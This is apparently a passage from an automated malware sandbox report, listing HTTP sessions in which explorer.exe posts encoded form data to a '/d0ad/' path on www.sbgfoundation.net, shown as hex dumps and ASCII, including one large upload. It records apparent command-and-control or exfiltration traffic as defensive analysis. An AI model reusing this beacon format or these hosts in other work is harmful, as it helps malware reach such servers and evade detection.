fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.11.20	49919	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:47.696310043 CEST	1609	OUT	POST /d0ad/ HTTP/1.1 Host: www.sbgfoundation.net Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.sbgfoundation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sbgfoundation.net/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6e 6d 53 37 42 62 48 78 68 53 67 61 66 6d 79 55 68 46 61 4f 36 74 73 70 6e 34 61 32 65 34 66 79 46 62 62 43 61 53 38 62 52 42 32 45 6b 4f 39 49 78 69 58 69 68 48 52 73 68 32 68 6e 53 74 4d 37 77 30 59 4a 73 54 4d 69 62 4b 77 79 41 49 67 30 56 50 39 69 6d 77 5a 68 52 44 72 54 50 67 78 42 6c 39 75 31 4d 66 33 68 4b 45 38 38 6d 55 42 4f 52 48 72 32 71 57 32 43 72 79 35 74 74 5a 53 43 37 32 30 70 38 6d 41 53 44 39 55 4a 62 73 58 30 54 34 4e 66 39 4f 68 77 4c 53 55 50 28 52 56 30 39 51 46 43 6f 76 44 67 64 61 4e 77 30 57 4b 46 46 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=nmS7BbHxhSgafmyUhFaO6tspn4a2e4fyFbbCaS8bRB2EkO9IxiXihHRsh2hnStM7w0YJsTMibKwyAIg0VP9imwZhRDrTPgxBl9u1Mf3hKE88mUBORHr2qW2Cry5ttZSC720p8mASD9UJbsX0T4Nf9OhwLSUP(RV09QFCovDgdaNw0WKFFg).
Oct 26, 2022 13:19:47.859009027 CEST	1610	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.11.20	49920	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:49.871920109 CEST	1611	OUT	POST /d0ad/ HTTP/1.1 Host: www.sbgfoundation.net Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.sbgfoundation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sbgfoundation.net/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6e 6d 53 37 42 62 48 78 68 53 67 61 65 48 43 55 6e 6d 79 4f 76 64 73 6f 69 34 61 32 58 59 66 2d 46 61 6e 43 61 58 63 78 51 33 4f 45 6b 71 78 49 77 68 50 69 6b 48 52 73 75 57 68 59 63 4e 4d 67 77 30 46 30 73 53 63 69 62 4b 6b 79 53 4e 73 30 45 66 39 6a 6f 51 59 54 42 54 72 57 4c 67 78 50 6c 39 79 54 4d 65 6a 68 4b 56 51 38 68 53 64 4f 57 57 72 31 38 47 33 4a 37 43 35 75 6b 35 53 32 37 32 34 58 38 69 45 6b 44 49 55 4a 63 4e 33 30 63 59 4e 63 6b 75 68 33 43 79 56 7a 79 7a 38 51 79 53 42 69 70 4f 50 35 62 70 4e 2d 31 6c 6a 57 51 58 33 5a 4a 43 66 39 62 45 52 57 71 55 57 41 33 6e 75 53 39 63 4c 68 4d 34 52 66 70 53 45 5a 6b 55 74 69 48 36 57 76 6d 56 6a 70 57 6e 56 31 48 38 71 30 5a 4e 54 51 71 4a 35 41 4a 52 65 48 77 41 54 5a 6d 48 34 50 4c 42 70 39 6e 46 51 66 39 6a 62 6c 4b 68 4e 74 53 66 7a 46 41 7a 61 77 30 50 79 35 73 6f 70 35 6e 54 6f 46 43 36 38 6f 6c 68 39 77 61 45 4f 58 79 6a 52 53 6d 68 52 70 38 50 45 32 4c 6e 6c 77 5a 43 50 6b 31 32 4c 42 69 63 71 76 38 32 52 68 79 59 54 32 79 77 71 75 50 34 55 57 43 6d 4d 6c 38 59 44 39 66 6e 71 48 4e 59 54 77 34 46 71 6a 28 63 6c 34 36 61 38 35 79 78 48 47 4f 4f 7a 43 53 44 4c 6c 35 41 37 5a 64 70 5a 6f 78 4f 42 56 69 71 4b 49 4b 41 77 62 38 52 59 70 54 65 72 39 43 4b 68 46 51 35 75 66 4d 31 47 58 4a 51 53 49 58 42 49 78 52 58 54 5f 38 47 61 55 62 2d 77 77 6d 49 45 52 4d 39 55 59 45 35 69 42 73 5f 48 2d 4b 43 78 34 4d 38 65 73 53 74 43 38 4d 78 6f 58 55 67 67 76 38 72 4b 54 6e 62 38 56 7a 52 73 2d 70 47 41 4c 48 35 37 79 49 6e 28 58 6e 39 54 49 55 67 76 64 6e 78 4b 67 41 56 74 79 31 4f 73 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=nmS7BbHxhSgaeHCUnmyOvdsoi4a2XYf-FanCaXcxQ3OEkqxIwhPikHRsuWhYcNMgw0F0sScibKkySNs0Ef9joQYTBTrWLgxPl9yTMejhKVQ8hSdOWWr18G3J7C5uk5S2724X8iEkDIUJcN30cYNckuh3CyVzyz8QySBipOP5bpN-1ljWQX3ZJCf9bERWqUWA3nuS9cLhM4RfpSEZkUtiH6WvmVjpWnV1H8q0ZNTQqJ5AJReHwATZmH4PLBp9nFQf9jblKhNtSfzFAzaw0Py5sop5nToFC68olh9waEOXyjRSmhRp8PE2LnlwZCPk12LBicqv82RhyYT2ywquP4UWCmMl8YD9fnqHNYTw4Fqj(cl46a85yxHGOOzCSDLl5A7ZdpZoxOBViqKIKAwb8RYpTer9CKhFQ5ufM1GXJQSIXBIxRXT_8GaUb-wwmIERM9UYE5iBs_H-KCx4M8esStC8MxoXUggv8rKTnb8VzRs-pGALH57yIn(Xn9TIUgvdnxKgAVty1Os.
Oct 26, 2022 13:19:50.034704924 CEST	1612	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:49 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.11.20	49921	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:52.043828964 CEST	1621	OUT	POST /d0ad/ HTTP/1.1 Host: www.sbgfoundation.net Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.sbgfoundation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sbgfoundation.net/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6e 6d 53 37 42 62 48 78 68 53 67 61 65 48 43 55 6e 6d 79 4f 76 64 73 6f 69 34 61 32 58 59 66 2d 46 61 6e 43 61 58 63 78 51 30 75 45 6b 5a 35 49 78 41 50 69 6e 48 52 73 77 6d 68 6a 63 4e 4e 79 77 30 4e 77 73 53 52 5a 62 49 63 79 53 39 63 30 45 74 46 6a 34 41 59 48 45 54 72 51 50 67 78 68 6c 39 75 48 4d 65 33 78 4b 45 30 38 6d 51 46 4f 52 68 58 32 28 57 32 43 37 43 35 69 7a 70 53 49 37 32 4d 48 38 69 49 6b 44 4f 55 4a 61 2d 50 30 51 72 6c 63 7e 4f 68 30 62 69 56 38 34 54 38 6c 79 57 68 51 70 4f 50 50 62 72 68 2d 31 6a 6a 57 52 55 50 65 4a 69 66 39 59 45 52 56 68 30 61 63 33 6e 7a 56 39 63 28 68 4d 2d 56 66 6d 53 45 5a 76 52 52 6c 44 61 57 70 31 46 6a 79 53 6e 49 32 48 38 7e 4b 5a 50 66 51 74 39 52 41 62 32 4b 48 7a 68 54 5a 75 48 34 4a 55 52 70 55 39 31 51 54 39 6a 4b 30 4b 67 74 54 53 64 28 46 42 53 36 77 78 72 47 36 6c 6f 70 5f 6f 7a 70 46 56 71 67 30 6c 6e 63 79 61 45 4f 48 79 6d 31 53 6e 53 5a 70 39 4e 39 67 47 58 6b 5a 52 69 4f 6d 67 47 33 50 69 63 33 6a 38 33 35 78 79 66 4c 32 7a 51 71 75 46 37 38 5a 62 47 4e 74 68 6f 43 36 52 48 72 46 4e 59 66 61 34 45 65 56 28 73 5a 34 72 2d 59 35 77 52 48 4a 45 4f 7a 4f 62 6a 4c 6a 39 41 37 5a 64 70 56 57 78 4f 4e 56 68 62 79 49 59 6e 4d 62 71 53 77 70 65 2d 72 37 43 4b 68 55 51 35 72 72 4d 31 4f 31 4a 54 4b 6d 58 45 34 78 53 47 44 5f 37 48 62 43 65 4f 77 78 69 49 45 47 53 4e 52 48 45 35 50 4d 73 5f 58 78 4a 77 31 34 65 4d 4f 73 57 74 43 39 61 68 70 52 58 67 67 35 33 4c 32 66 6e 62 52 75 7a 51 59 75 70 46 77 4c 45 65 48 6c 62 6e 50 55 7e 74 4b 6b 56 41 33 61 73 44 62 30 55 32 70 50 69 4a 68 79 31 47 63 5a 46 57 54 34 35 4d 64 31 30 6a 71 58 33 7a 37 70 4e 64 74 54 6a 2d 38 4f 36 74 4a 61 6a 6f 32 6b 32 44 6c 50 30 56 75 62 32 5f 7a 46 38 4f 6b 33 41 6d 4b 52 49 62 4f 33 41 33 49 78 41 50 45 61 38 78 59 51 4b 5f 69 70 53 53 76 68 28 50 48 58 4a 35 32 44 75 43 54 41 37 32 32 50 63 6e 64 31 51 31 7a 4f 64 52 37 62 62 34 73 72 6f 30 38 74 67 6c 69 65 31 6d 79 6c 75 74 59 46 43 4a 59 4d 75 57 55 4c 34 69 39 4c 66 35 66 63 4d 72 56 77 4c 6e 44 48 51 6b 74 70 70 37 52 4b 46 55 65 5f 78 56 6f 6c 50 42 59 75 67 46 49 41 36 36 64 2d 4b 48 6a 54 78 76 69 35 56 5f 4f 66 71 77 63 33 38 5a 51 30 38 79 63 74 77 33 67 68 45 63 38 6c 33 6c 28 6d 7e 37 41 39 45 63 61 4a 44 77 57 76 6e 39 6f 73 75 36 4c 62 75 6c 63 30 34 6b 4c 2d 57 78 67 61 67 42 4a 4c 56 45 46 70 57 6d 75 74 73 65 56 45 61 66 48 45 77 57 6b 54 35 38 66 77 4d 52 36 5f 74 67 79 62 36 35 37 57 69 36 4e 41 4f 79 67 74 52 30 76 63 53 45 7e 41 7a 2d 39 4c 42 66 45 50 33 47 39 71 55 72 71 73 28 6a 36 74 68 62 47 49 48 4f 71 5f 77 35 62 4e 72 49 4b 41 78 62 38 69 58 33 51 41 31 4e 36 54 72 53 41 69 33 58 35 2d 36 6a 6f 43 43 48 66 35 58 4f 7e 6c 73 48 65 52 72 6a 67 6e 6f 57 50 4b 36 78 75 39 36 4c 30 48 36 30 63 33 7e 58 4a 34 65 51 46 66 36 69 74 71 79 4f 46 6f 57 75 62 56 4c 44 36 43 41 44 67 36 57 7a 34 49 53 56 43 62 34 52 6d 30 59 4d 38 43 54 42 59 4c 59 72 4e 73 56 4d 62 2d 30 61 4f 55 7a 43 75 71 6b 52 45 71 4a 65 7e 4c 46 46 6c 67 43 77 4b 70 37 2d 33 44 7a 4a 46 56 7a 52 66 45 51 39 4a 5a 75 32 7e 53 65 75 46 69 64 51 48 4f 63 54 59 62 67 6b 41 31 38 4b 48 6c 78 56 76 6d 47 55 72 6e 4f 71 77 39 72 4e 37 53 55 49 73 5f 51 79 7a 35 65 6e 36 6b 78 37 36 37 6e 32 36 7a 55 51 4e 73 4b 75 72 68 61 72 69 46 59 76 41 43 78 54 7e 4a 37 2d 30 47 69 6d 62 74 67 66 5a 41 68 33 66 36 6c 46 66 76 6a 53 73 33 34 34 68 6c 51 36 79 69 73 79 44 76 53 41 5a 79 76 35 38 46 6f 4f 54 58 65 73 34 54 36 41 55 56 36 66 74 49 37 6a 36 63 33 63 7a 33 41 46 6c 70 31 55 74 46 71 70 59 41 61 56 44 45 4a 4b 42 4a 41 79 6c 7a 36 65 76 5f 59 6d 43 6d 69 68 34 46 6e 32 49 6f 30 54 6c 6c 33 52 65 55 58 65 38 75 31 54 55 74 41 71 77 39 6b 59 5a 32 4a 7a 50 2d 33 43 4e 6e 46 43 4c 6b 54 39 4a 73 63 7a 44 79 54 6b 55 36 4c 46 76 7a 57 41 52 64 54 45 45 73 31 32 53 71 63 71 42 30 34 46 28 35 77 69 55 79 74 51 59 5a 75 30 74 37 55 32 58 78 38 62 75 46 32 74 69 67 4d 5a 61 6b 53 37 33 30 31 32 52 30 57 6d 72 46 7a 6b 61 48 44 78 76 31 36 79 46 49 71 61 65 39 64 64 42 43 66 70 58 30 49 39 6c 30 77 58 6b 72 78 35 31 52 46 6b 61 4d 6b 39 4c 42 4c 6b 48 Data Ascii: jXu=nmS7BbHxhSgaeHCUnmyOvdsoi4a2XYf-FanCaXcxQ0uEkZ5IxAPinHRswmhjcNNyw0NwsSRZbIcyS9c0EtFj4AYHETrQPgxhl9uHMe3xKE08mQFORhX2(W2C7C5izpSI72MH8iIkDOUJa-P0Qrlc~Oh0biV84T8lyWhQpOPPbrh-1jjWRUPeJif9YERVh0ac3nzV9c(hM-VfmSEZvRRlDaWp1FjySnI2H8~KZPfQt9RAb2KHzhTZuH4JURpU91QT9jK0KgtTSd(FBS6wxrG6lop_ozpFVqg0lncyaEOHym1SnSZp9N9gGXkZRiOmgG3Pic3j835xyfL2zQquF78ZbGNthoC6RHrFNYfa4EeV(sZ4r-Y5wRHJEOzObjLj9A7ZdpVWxONVhbyIYnMbqSwpe-r7CKhUQ5rrM1O1JTKmXE4xSGD_7HbCeOwxiIEGSNRHE5PMs_XxJw14eMOsWtC9ahpRXgg53L2fnbRuzQYupFwLEeHlbnPU~tKkVA3asDb0U2pPiJhy1GcZFWT45Md10jqX3z7pNdtTj-8O6tJajo2k2DlP0Vub2_zF8Ok3AmKRIbO3A3IxAPEa8xYQK_ipSSvh(PHXJ52DuCTA722Pcnd1Q1zOdR7bb4sro08tglie1mylutYFCJYMuWUL4i9Lf5fcMrVwLnDHQktpp7RKFUe_xVolPBYugFIA66d-KHjTxvi5V_Ofqwc38ZQ08yctw3ghEc8l3l(m~7A9EcaJDwWvn9osu6Lbulc04kL-WxgagBJLVEFpWmutseVEafHEwWkT58fwMR6_tgyb657Wi6NAOygtR0vcSE~Az-9LBfEP3G9qUrqs(j6thbGIHOq_w5bNrIKAxb8iX3QA1N6TrSAi3X5-6joCCHf5XO~lsHeRrjgnoWPK6xu96L0H60c3~XJ4eQFf6itqyOFoWubVLD6CADg6Wz4ISVCb4Rm0YM8CTBYLYrNsVMb-0aOUzCuqkREqJe~LFFlgCwKp7-3DzJFVzRfEQ9JZu2~SeuFidQHOcTYbgkA18KHlxVvmGUrnOqw9rN7SUIs_Qyz5en6kx767n26zUQNsKurhariFYvACxT~J7-0GimbtgfZAh3f6lFfvjSs344hlQ6yisyDvSAZyv58FoOTXes4T6AUV6ftI7j6c3cz3AFlp1UtFqpYAaVDEJKBJAylz6ev_YmCmih4Fn2Io0Tll3ReUXe8u1TUtAqw9kYZ2JzP-3CNnFCLkT9JsczDyTkU6LFvzWARdTEEs12SqcqB04F(5wiUytQYZu0t7U2Xx8buF2tigMZakS73012R0WmrFzkaHDxv16yFIqae9ddBCfpX0I9l0wXkrx51RFkaMk9LBLkH-jc53LkYbE9Qvgp9JTpIJsu3FlDK7e-8omLvurBxlpJDwm6yXBiUd1BFHJtdfT7bwOy9D0eU1xRxL3y9aL2FJ6KmNt6s88nvxT4UccIk-VELk39380j093j0OnPV-XAex6QszWhRnfjjCit8Oi66mzYTlnaPZZg(NKrjyd1vnUDAuYIVQYAXLE9cBiC4DDfKXAw~7F8x8oGCeNBHRsEwBfRYor-4LfHjxRIlc6sd4Qg58Mm(sjmOUk9wVZ3kZcSrDBmUXujy2MqFZC6vC61whg5Pqfglni8qRlDKVRJnR05FXvqg9Inp0mE6aGjHMMmiQzmxxYfTC~PK3GMOZY2ERBNs5Xrl43HOsLeXfw8fzPMZdD98WrE4bZCc5I4fAIne2(bSW(fJrfH8cvUujbcizWTi8G5tXEEhei5r_OFwL8FPhBccZjAczpPOCD_xMKlawU4GXnFUoFJ(nQiTBXIh6sqwKNo3u~VkfNhjh7MRVYBgrTEOh1NodGtX-6lW_xILVBc(f2DgOLeF2qgbB95ZtsT9AkUlunM0l7jYAbzRgEFis1OAb1m6kxJghHTTIyrexy1UKvPnm6zpArU51cPN3JtZuvVZP(j9lAp~LoFOPiEYQOKo25I4p8mYnm4PSRbyToK6Jd0H1at(tLss5pnI-PqUvwnp6z53qbcXsV1nDaBlWr1umByIeXt6IiIZzWHZOyC0IU8FoA8BGMUkPaRpQRXxJdl5bhEf20O8WZjCjqHNGFWhrLN8DWq4N7symKX1b1xcWbGXAn1bwdZjgRyExMX7v5EfYFXJmkgMvi0J_9G(ovagToGJHKtq8bMZqo658YpXZTT3hIiDt8dvvj3TjkvYXII49(eZ2Oiy2OvNTTPvQwkpXJlp4ND4ajCHolvckletV14Kjesb-6iISFrK60dunvmYwPnrR2p02XTsmL8H97gwGDeGUkigE6a~HXCySK7bD78f_Z699pLEovJlsDCCEtTD4dB05jxL7JofH1PC7qVQFkz~jkMT28GKHqXgsCVUb~h1TJjL1Xn5obezgScR_ufTIA161Xc3fQqs_1fKPE7Ljd6yBPc6apQE5NCT59wa6qwEMJRMbS4DaateH(07mX68ccSHAE_qAmbnkLpbEV77Z9RRGw58yv9SZMrWiICSk(yMqv8z6cIwm0NDRQYegKLP2LRVmrJQbGzRV(bA3bj~zqExoHPLpGItVMgML(ij_mP7hUu2GBTJtWQLdcn6YPsy9HCZQVJKa9LRJ(KmkTSMNtqMy30sfMjX5fPLeGNDoOHU3(U0QnexTVeqIhS6QGO9VdPzamn7ROP0GiU5DWZNyYOWpIERMWSOTA-5C8-z0Tkql4PK0lVM8kEuTE9RBGjMg4jYOia0gg8tKrD0zxLlwTor36oB3WNq-kGOdmsOsAcgcwnTn(9YDTqjmITbkyi1IY3g-fR~i76tv1xCII-DogacA4xtx7fhiLfljCVdoA25GDbUJUTsnsRpEy0v9QG5N9eG8(_glzNWc3vWLv7ye(oBRa2bnQkAz4wacFy4km0czwzV71YfYQIgxb8zjPuRYkJpngCgZ9iud1ULeAYtHUr34sn20mTahV-xBfytySwNL456klJL-WYSnOSNmuztsatl1dWuubHyxu_y64NxmgjONWsMNqC(nPaVUkFDay1FNjqnil_9RLTNLqjfBFWQYpkbk0QscaBWn9HDRJqQskTrFrhdSTpP14t8X4JhAn8OOtpoTWFyY8Dah9E69XzRaOiaaq0jHjaUkrGHi7hCyvzpf8Qi6232H93tojC7kXyLW~TFPWk2S~kS89refIvd2AHcJjZ(kZ2mLZlca38ZqPe3Z2FeuH4jIR4gCjIeJkPVxV1GO~mWCEgkNHXMn2re71ziLLwYwJJ7qJ6SuWOZyeUSno67NphawW0ByHuZQmGefHIEyoMd-IZqJRjoVoZU4KaqSHdwFnHem8VcjOGvq5o33r2Sx7Itk9bFZIik2lscqAQXqJMchCwTm~-5fVNtSWu4ackfmJ1ADSVi6rmGunUWX3bEviBnsC4kxeL2aEDsI5kfaxQgcczpBCM(8l5eRocFunLtP(svXCuIiIlWmTolefgazDxhX2c540cffJLcaAV8ITunzghiYxEDtfko8fzTxNMhewA40Q2jRTLImB_rADAmJQ_ht2PCBN6pqI5nqykepDXZiL6OHK6Ftct3fJRu1ePXVu7eZtNvgAI8GnNG3R-f7Fr2KtrTr93LOZqZaRQtYc0c9erQ67iMrYU8b6kwcYDDvQrazxSH2gLBc1tTkdzTbTMOoxY~7HEiwTQmQ0C4kJFnj3LmswjtyOQOUp2VEvzMRUz79pENiC8RAC4M0EO(ff1uaA9ZIAOfzijRNU2RUlCbaJ7visEYDf4IgUYVVcvCp7vroRL~qNv2mSsoJxwkrxn8zorcz~CsUftVSJR8CfMzNzcokkDcthhMuXWYJvco5~TBm(g3HD2wQiwndo40I1qMGMx8BvxF-yHYpRn98ZzDbexTw~jApLo4t81Q2B5Bv6nukt1qtq9H_du1O5U(9jbPa~dGvOAxCYPF5lJIb53~NzHSLOuqf(dm9mDXFPjpzUk7D(SEAUokVTgXAg4jufgcF9NVo566Jxg0xkU0eMuf3r1LFX2nxQQRWs1GTpWHB6iywrE5aMYtIa2uvcAtX~Ly2c3WKi_7vG8oNO82VQ-M2GF9WDaWoGSO30Li1ei
Oct 26, 2022 13:19:52.043951988 CEST	1625	OUT	Data Raw: 55 6a 7a 42 42 6f 33 33 72 78 33 7e 74 53 51 5a 4a 6c 4d 37 78 56 33 46 68 63 73 49 4e 79 5f 35 62 49 54 77 39 54 31 58 5f 6e 76 42 30 62 32 7e 6b 4c 38 77 57 35 7a 41 65 44 2d 28 6f 76 70 67 63 33 69 59 32 67 50 70 30 46 39 34 6b 49 6e 72 65 59 Data Ascii: UjzBBo33rx3~tSQZJlM7xV3FhcsINy_5bITw9T1X_nvB0b2~kL8wW5zAeD-(ovpgc3iY2gPp0F94kInreY7ry5AGzIygkvli2HuAw7iqDvuDaV9CfPQJMK-0yKmEv(_3vyq4pNTEtoJDK650auoPrBasKMZOnBHSuLMz6ApfsiHdB~KUWqdfOyxI19uDecSrNi2q2G5SNV7(u6PTNlW5vanlVAmZLKOV7If1oQg(FmFtOhpsABh
Oct 26, 2022 13:19:52.196779966 CEST	1628	OUT	Data Raw: 46 6d 56 68 76 4c 47 76 35 65 69 6d 61 33 6b 49 69 54 58 36 64 42 75 64 50 6e 6c 55 4b 34 67 79 33 79 30 65 63 37 50 66 5a 46 6b 4c 6c 49 59 28 61 41 4b 64 61 49 6f 57 54 73 6c 58 5f 76 62 4d 58 64 4f 33 47 78 66 4e 37 47 32 45 70 31 6d 31 4e 64 Data Ascii: FmVhvLGv5eima3kIiTX6dBudPnlUK4gy3y0ec7PfZFkLlIY(aAKdaIoWTslX_vbMXdO3GxfN7G2Ep1m1NdkSuDpqkgnW_p1UVxJKNQfvFTYlfDJni(W7kxnK-oOtrP2SOp4zoEtVKpSeCLyIGhSMDm4HvlglNQQuGmyqoABf4sEPYWKliEy7R2Za94lhjrQTNWfCrz95ugr5TKmA62qOn~qZYVMqhq3bgoOky7F5kBFwOvci-1O
Oct 26, 2022 13:19:52.196943998 CEST	1632	OUT	Data Raw: 6e 6c 72 4b 77 46 55 59 43 53 4c 64 4c 64 52 34 56 6b 52 41 45 68 31 68 41 6e 6a 5a 55 58 44 4c 33 42 33 6e 2d 78 6d 47 46 69 5a 55 54 50 71 55 46 75 57 48 48 64 55 6f 46 49 64 39 33 47 36 39 4a 77 5a 77 6a 32 6f 75 64 46 36 74 47 6a 79 66 68 51 Data Ascii: nlrKwFUYCSLdLdR4VkRAEh1hAnjZUXDL3B3n-xmGFiZUTPqUFuWHHdUoFId93G69JwZwj2oudF6tGjyfhQ1a7pcoB0P~71XW1RF5oaXAFTMK6xiGS2qxMiVCz1E9lP5ikE-QgTHBT2xYBW33YVCJZLthyYmwSCnKE4p7OhgqFgsUuZsUsvXRQNz1KyXoOz7USYET06qxNzMGU30bcKvTvHomE1bIg(2Yh8rVJR4I69NMzRQiWib
Oct 26, 2022 13:19:52.197118044 CEST	1635	OUT	Data Raw: 76 41 42 28 77 6d 59 71 77 71 6a 46 69 72 72 4a 4c 4d 67 32 30 64 2d 6a 79 7a 4a 76 7a 66 42 4b 49 50 65 41 57 58 41 48 54 47 66 7a 68 49 52 33 42 6d 30 71 66 66 50 58 34 52 33 70 6d 63 67 4b 6a 46 5a 50 67 41 49 4c 68 44 67 6f 58 67 56 61 6a 64 Data Ascii: vAB(wmYqwqjFirrJLMg20d-jyzJvzfBKIPeAWXAHTGfzhIR3Bm0qffPX4R3pmcgKjFZPgAILhDgoXgVajdyrDGTC_GcTeYBHxJKnl2MDUvtUt5wNJTC0xGOWHFoc6C9hN2t0-3QC2qrHh5Ofx3-bY0_xUjL0nONGbQGMnpprHC8FW0z3clXmEg_xrdLBmOT56u5HTe29ktw2C8ivo7BH9zJ02Yo~WvE88uW(FmgoCwzfnq9mTP8
Oct 26, 2022 13:19:52.197297096 CEST	1641	OUT	Data Raw: 4a 69 43 58 58 74 73 57 30 59 7a 53 78 48 38 77 6a 71 38 61 4d 36 79 5a 6c 45 78 69 59 4f 42 35 72 4e 50 7e 72 64 44 46 55 37 48 41 64 62 55 58 74 73 41 58 67 6a 37 66 65 51 44 49 66 72 58 28 67 4f 49 57 71 34 6f 68 59 55 34 4f 58 62 6e 38 56 6e Data Ascii: JiCXXtsW0YzSxH8wjq8aM6yZlExiYOB5rNP~rdDFU7HAdbUXtsAXgj7feQDIfrX(gOIWq4ohYU4OXbn8VnAUwjjWWebZV5yJez_EcfUNMN_vx5gGcR_frA3fMk31lzdTnpx(1giG6TU46~FixzBjybfxjbrjwZa2_vExcd9A7gu2aXw~15lCw~ntNCi34BK4qtgbPMiJt1VvXh-Dedh3GZIa9FPuopFRHBjhXRKbqnR3zoe4_KI
Oct 26, 2022 13:19:52.197464943 CEST	1647	OUT	Data Raw: 45 76 6c 59 38 52 6a 63 4e 79 5a 34 76 55 53 74 56 48 73 41 4b 45 32 76 42 77 4e 4e 5f 74 5f 5a 65 5a 71 73 66 35 49 51 7a 28 79 4a 67 7a 5a 70 44 35 73 45 67 36 4a 56 7a 67 48 37 6f 4c 33 46 56 33 50 45 50 4b 64 50 4d 59 69 50 61 4b 61 76 55 33 Data Ascii: EvlY8RjcNyZ4vUStVHsAKE2vBwNN_t_ZeZqsf5IQz(yJgzZpD5sEg6JVzgH7oL3FV3PEPKdPMYiPaKavU3DQbHZONwxHRUeB0PkGGKSKkBvwYix7TxeC-QsLhTP0MvVb6foAQa4rJRAhLGBlQZL134rsEq_pnNJA2OX4ZXFeDXUo-uZ7Av38zClCI4lXHFU6R2HgFoIlv0dwNWNUwtBVz4akQa88OveUvQNZR2VRjczC1XPQu5z
